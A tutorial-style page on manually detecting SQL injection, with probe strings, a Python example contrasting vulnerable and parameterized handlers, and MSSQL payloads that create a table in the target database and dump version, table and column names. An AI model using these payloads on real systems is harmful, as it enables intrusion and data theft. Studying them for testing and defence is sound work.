SQLi
Checking for SQLi can sometimes be very simple. The way I begin tackling SQL injection (not blind SQLi) is to try just a few techniques. What matters is how you read the response: understanding the response is what tells you whether an injection may exist.
I normally start with an XSS-style text input; I like to use `'">asdf` or something similar. If I can see that an error occurred, or that the characters came back in the response without being encoded, I am on the path to finding something.
Sometimes you may not be able to close out the string because of limits on which characters are allowed. In that case you may want to try `string' and 'a'='a` (where `string` is the value the application expects): if the response matches the one for the plain value, the appended condition was evaluated as SQL.
If I am dealing with numbers I use the minus sign. This may require knowing two integers you have access to. If I have access to records 4 and 1 but not 2 and 3, I can try `5-1` to see if it pulls record 4, or `4-3` to see if I can reach item 1. I use the minus because certain applications will decode `+` as a space, so unless you explicitly send `%2b` you may miss your injection.
If I see a parameter that looks like a sort function, e.g. `name=StateName&sort=desc`, then you may want to try swapping `StateName` for the number 1, then for 9999. If 9999 errors and 1 does not, the value is probably being used as a column position, and you may be able to tell how many columns are being returned, to then run SQLmap if you'd like.
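To make the probes above concrete from the defender's side, here is an added Python example (not from the original page): a hypothetical handler that concatenates a URL-decoded parameter into a query, next to its parameterized counterpart, over a constructed SQLite table. The `'">asdf`, `string' and 'a'='a`, `5-1` and `+`/`%2b` probes behave as described against the first handler and do nothing against the second.

```python
import sqlite3
from urllib.parse import unquote_plus

def make_db():
    """Constructed sample data (not from the original page): four state rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE states (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO states VALUES (?, ?)",
                     [(1, "Alabama"), (2, "Alaska"), (3, "Arizona"), (4, "Arkansas")])
    return conn

def run(conn, sql, params=()):
    """Execute and return rows, or the string 'ERROR' when the DB rejects the query,
    mimicking an application that surfaces a database error in its response."""
    try:
        return conn.execute(sql, params).fetchall()
    except sqlite3.Error:
        return "ERROR"

def name_vulnerable(conn, raw):
    # Hypothetical handler: the URL-decoded value is pasted straight into the SQL text.
    value = unquote_plus(raw)          # '+' decodes to a space, '%2b' decodes to '+'
    return run(conn, f"SELECT id, name FROM states WHERE name = '{value}'")

def name_safe(conn, raw):
    # Hardened form: the value travels as a bound parameter, never as SQL text.
    return run(conn, "SELECT id, name FROM states WHERE name = ?", (unquote_plus(raw),))

def id_vulnerable(conn, raw):
    # Numeric field concatenated without quotes, so arithmetic like 5-1 is evaluated by the DB.
    return run(conn, f"SELECT id, name FROM states WHERE id = {unquote_plus(raw)}")

def id_safe(conn, raw):
    # Hardened form: reject anything that is not a plain integer before it reaches the DB.
    try:
        id_ = int(unquote_plus(raw))
    except ValueError:
        return []
    return run(conn, "SELECT id, name FROM states WHERE id = ?", (id_,))

if __name__ == "__main__":
    db = make_db()
    for raw in ["'\">asdf", "Alabama' and 'a'='a", "Alabama' and 'a'='b"]:
        print(f"{raw!r:26} vuln={name_vulnerable(db, raw)}  safe={name_safe(db, raw)}")
    for raw in ["5-1", "3+1", "3%2b1"]:
        print(f"{raw!r:26} vuln={id_vulnerable(db, raw)}  safe={id_safe(db, raw)}")
```

Note how `3+1` errors against the vulnerable handler because the `+` decoded to a space, while `3%2b1` returns record 4; that is the difference the minus-sign and `%2b` advice above is about.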
############## CREATING A TABLE TO STORE INJECTION DATA ##############
Create a table to inject into:
```sql
CREATE TABLE YOUNAMEYOURTABLE (ID int IDENTITY(1,1) PRIMARY KEY, data varchar(8000));--
```
Insert data into your table:
```sql
insert into YOUNAMEYOURTABLE (data) Select @@Version--
```
Grab all the database tables into 1 record separated by a ';'. The leading `%2b` concatenates this fragment onto the preceding string expression (e.g. the `Select @@Version` above); if not using a web application, replace the `%2b` with a `+`:
```sql
%2bSTUFF((SELECT '; ' %2b TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' AND TABLE_CATALOG='REPLACEME' FOR XML PATH('')), 1, 1, '')--
```
Grab all the table columns into 1 record separated by a ';'. If not using a web application, replace the `%2b` with a `+`:
```sql
SELECT 'PutTheTableNameHereForReference: ' %2bSTUFF((SELECT '; ' %2b column_name FROM TheDatabaseYouWantToQueryFrom.INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='REPLACEME' FOR XML PATH('')), 1, 1, '')--
```

Warning: All the information provided on this site is for educational purposes only. The site or the authors are not responsible for any misuse of the information. You shall not misuse the information to gain unauthorized access and/or write malicious programs. The information shall only be used to expand knowledge and not for causing malicious or damaging attacks.